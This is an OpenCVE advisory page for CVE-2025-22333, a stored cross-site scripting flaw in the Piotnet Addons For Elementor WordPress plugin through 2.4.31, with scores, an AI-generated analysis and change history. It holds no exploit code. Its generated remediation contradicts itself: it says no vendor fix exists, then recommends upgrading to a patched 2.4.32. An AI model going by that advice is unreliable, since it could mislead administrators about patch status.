Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in piotnetdotcom Piotnet Addons For Elementor piotnet-addons-for-elementor allows Stored XSS.This issue affects Piotnet Addons For Elementor: from n/a through <= 2.4.31.
Published: 2025-01-07
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The plugin stores user‑controlled data that is later displayed without proper output encoding, allowing an attacker to inject malicious JavaScript that executes in the browser of any user who views the affected content. This can lead to session hijacking, credential theft, or site defacement. The weakness corresponds to CWE‑79.

Affected Systems

The WordPress plugin Piotnet Addons For Elementor, version 2.4.31 and earlier, is affected. Any site that has installed this plugin and has written content using the plugin’s modules is potentially vulnerable.

Risk and Exploitability

The CVSS score of 6.5 indicates a moderate severity, while the EPSS score of less than 1% implies a low probability of exploitation at present. The vulnerability is not listed in the CISA KEV catalog. Exploitation likely requires the attacker to have the ability to add or edit content via the plugin’s interface, which may be achievable through an authenticated session. Once the stored payload is rendered, the injected script runs with the privileges of the end‑user, providing complete client‑side compromise.

Generated by OpenCVE AI on May 1, 2026 at 22:38 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Piotnet Addons For Elementor to version 2.4.32 or newer to apply the vendor patch.
  • Remove or disable any content modules that may contain stored user input before upgrading, and regenerate the affected pages to eliminate legacy data.
  • Configure a web‑application firewall or equivalent input validation to block script injection patterns in future content submissions.

Generated by OpenCVE AI on May 1, 2026 at 22:38 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-2733 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Piotnet Piotnet Addons For Elementor allows Stored XSS.This issue affects Piotnet Addons For Elementor: from n/a through 2.4.31.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Piotnet Piotnet Addons For Elementor allows Stored XSS.This issue affects Piotnet Addons For Elementor: from n/a through 2.4.31. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in piotnetdotcom Piotnet Addons For Elementor piotnet-addons-for-elementor allows Stored XSS.This issue affects Piotnet Addons For Elementor: from n/a through <= 2.4.31.
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Tue, 07 Jan 2025 16:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 07 Jan 2025 11:00:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Piotnet Piotnet Addons For Elementor allows Stored XSS.This issue affects Piotnet Addons For Elementor: from n/a through 2.4.31.
Title WordPress Piotnet Addons For Elementor plugin <= 2.4.31 - Cross-Site Scripting vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Subscriptions

Piotnet Piotnet Addons For Elementor
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:10:59.643Z

Reserved: 2025-01-03T13:16:33.553Z

Link: CVE-2025-22333

cve-icon Vulnrichment

Updated: 2025-01-07T15:22:50.328Z

cve-icon NVD

Status : Deferred

Published: 2025-01-07T11:15:17.160

Modified: 2026-04-23T15:23:02.190

Link: CVE-2025-22333

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-01T22:45:26Z

Weaknesses